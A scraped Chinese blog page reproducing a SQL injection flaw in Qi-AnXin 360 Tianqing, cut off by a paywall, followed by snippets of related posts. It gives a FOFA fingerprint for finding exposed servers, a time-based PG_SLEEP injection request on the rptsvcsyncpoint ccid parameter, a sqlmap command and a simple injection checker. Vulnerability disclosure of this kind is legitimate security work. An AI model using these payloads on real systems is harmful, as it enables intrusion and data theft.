奇安信360天擎rptsvcsyncpoint和getsimilarlistSQL SQL注入漏洞(含批量验证poc)

已于 2024-04-05 15:10:04 修改
阅读量136 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-05 15:09:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137401145
版权

产品简介

奇安信360天擎是奇安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天擎”)产品。通过“体系化防御、数字化运营”方法,帮助政企客户准确识别、保护和监管终端,并确保这些终端在任何时候都能可信、安全、合规地访问数据和业务。天擎基于奇安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引擎,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力

rptsvcsyncpoint漏洞概述

天擎 rptsvcsyncpoint 存在SQL注入漏洞。

指纹识别

fofa-query: banner=”QiAnXin web server” || banner=”360 web server” || body=”appid":"skylar6” || body=”/task/index/detail?id={item.id}” || body=”已过期或者未授权,购买请联系4008-136-360

rptsvcsyncpoint漏洞复现

POC

GET /api/dp/rptsvcsyncpoint?ccid=1%27;SELECT%20PG_SLEEP(1)-- HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
U
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
安信360天rptsvcsyncpointgetsimilarlistSQL SQL注入漏洞
weixin_43567873的博客
03-09 148
安信360天rptsvcsyncpointgetsimilarlistSQL SQL注入漏洞
2021HW — 360天漏洞
战神/calmness的博客
04-13 3460
FOFA搜索 1、未授权访问 http://X.X.X.X/api/dbstat/gettablessize 2、未授权访问 3、延时注入 http://1XXXX/api/dp/rptsvcsyncpoint?ccid= GET /api/dp/rptsvcsyncpoint?ccid=';SELECT PG_SLEEP(5)-- HTTP/1.1 Host: XXXXXXXXXXX Cache-Control: max-age=0 Upgrade-Ins.
漏洞复现--安信360天rptsvcsyncpointSQL注入
qq_53003652的博客
11-10 707
基于安信全新的“川陀”终端安全平台构建,集成高性能病毒查杀、漏洞防护、主动防御引,深度融合威胁情报、大数据分析和安全可视化等创新技术,通过系统合规与加固、威胁防御与检测、运维管控与审计、终端数据防泄漏、统一管理与运营等功能,帮助政企客户构建持续有效的终端安全能力。该产品存在SQL注入漏洞,攻击者可通过此漏洞获取服务器权限。注入点在ccid,且数据库为PostgreSQL
Goby 漏洞发布|天终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞_安信漏洞(1)
最新发布
2401_84302761的博客
05-13 884
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Goby 漏洞发布|天终端安全管理系统 YII_CSRF_TOKEN 远程代码执行漏洞
m0_46699477的博客
07-19 2232
安信安信集团旗下一款致力于一体化终端安全解决方案的终端安全管理系统(简称“天”)产品。安信终端安全管理系统web部分使用yii框架 该版本框架自带反序列化入口点,攻击者可执行任意代码获取服务器权限。
360新天终端安全系统信息泄露漏洞poc脚本批量验证
weixin_43802646的博客
09-14 1238
360新天终端安全系统是面向行政单位的一系列产品安全处理方案,该终端安全系统存在未授权访问漏洞,导致一定敏感信息泄露。
CNVD-2020-62853 360天终端安全管理系统越权访问漏洞复现
afei001
04-24 1964
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 FOFA实战复现 4.2 360_Day-with_Unauthorized_POC-2.py 5.漏洞修复 声明:以下脚本具有攻击性,请勿非法使用,否则后果自负。请勿进行非授权测试,否则后果自负。 1.漏洞概述 360天终端安全管理系统,以大数据技术为支撑、以可靠服务为保障,它能够为用户精确检测已知病毒木马、未知恶意代码,有效防御APT攻击,并提供终端资产管理、漏洞补丁管理、安全运维管控、...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
该“NACOS身份认证绕过漏洞批量检测poc”是一个Proof of Concept(概念验证)文件,用于验证这个安全漏洞是否存在。POC文件通常包一段代码或者脚本,开发者或安全研究人员可以使用这些代码来测试特定系统是否易受...
360新天数据库及表未授权访问漏洞exp
06-26
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有360新天相关资产 python3 fofa-cwillchris.py -k title="360新天" 将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt ./360新天数据库及表未授权.bin -l 1.txt
wgpsec#peiqi-wiki#天 未授权越权访问1
07-25
数据库信息泄露漏洞漏洞描述天 存在未授权越权访问,造成敏感信息泄露漏洞影响天漏洞复现已上传
SQL注入漏洞简单挖掘-01
09-15
本课程提供了一个详细的SQL注入漏洞挖掘指南,包括环境搭建、自动化审计工具、直接挖掘select注入漏洞验证POC等等。通过学习这些内容,我们可以更好地理解SQL语言的工作原理,并且学会如何检测和exploit SQL注入...
终端安全管理系统clientinfobymid存在SQL注入漏洞
3tefanie丶zhou的博客
12-29 1288
【故事、故事,便是故去的事情了,多说无益。】
360新天未授权访问数据库名及表名漏洞exp
Cwillchris的博客
06-26 607
python3 fofa-cwillchris.py -k title="360新天"将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。./360新天数据库及表未授权.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
360天sql注入&&未授权访问
weixin_43227251的博客
04-14 3462
前台SQL注入 漏洞描述 天 存在SQL注入,攻击者可以通过漏洞上传木马 FOFA指纹 title=“360新天漏洞复现 漏洞地址 /api/dp/rptsvcsyncpoint?ccid=1 注入写shell: sqlmap python sqlmap.py -u https://x.x.x.x:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL 数据库信息泄露漏洞 漏洞描述 天 存在未授权越权访问,造成敏感信息泄露 漏洞复现
终端安全管理系统未授权访问&SQL注入漏洞
千寻的博客
05-06 3301
文章目录漏洞名称漏洞描述影响版本FOFA漏洞复现未授权复现第一步 查看漏洞点第二步 查看越权访问sql注入复现第一步 sql注入点第二步 延时注入修复建议 漏洞名称 天终端安全管理系统未授权访问&SQL注入漏洞 漏洞描述 天终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。 该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护; 天终端安全管理系统存在未
编写一个能够验证dvwasql注入漏洞poc
07-13
我可以帮你提供一个简单的示例代码来验证 DVWA(Damn Vulnerable Web Application)中的 SQL 注入漏洞。请注意,这个示例仅用于教育目的,不要在未经授权的情况下使用它。 ``` import requests def check_sql_injection_vulnerability(url): payload = "' OR '1'='1' -- " response = requests.get(url + "?id=" + payload) if "Error" in response.text: print("该网站存在 SQL 注入漏洞!") else: print("该网站不存在 SQL 注入漏洞。") # 在这里替换为你的 DVWA 网站的 URL dvwa_url = "http://example.com/dvwa/vulnerabilities/sqli/" check_sql_injection_vulnerability(dvwa_url) ``` 请确保替换 `dvwa_url` 变量为你自己的 DVWA 网站的 URL,然后运行代码。如果输出显示该网站存在 SQL 注入漏洞,则说明你的 DVWA 配置存在问题,需要进行修复。 请记住,这只是一个简单的示例,实际的 SQL 注入漏洞检测可能需要更复杂的测试方法和技术。在进行任何安全测试之前,请确保遵守法律和道德准则,并获得适当的授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值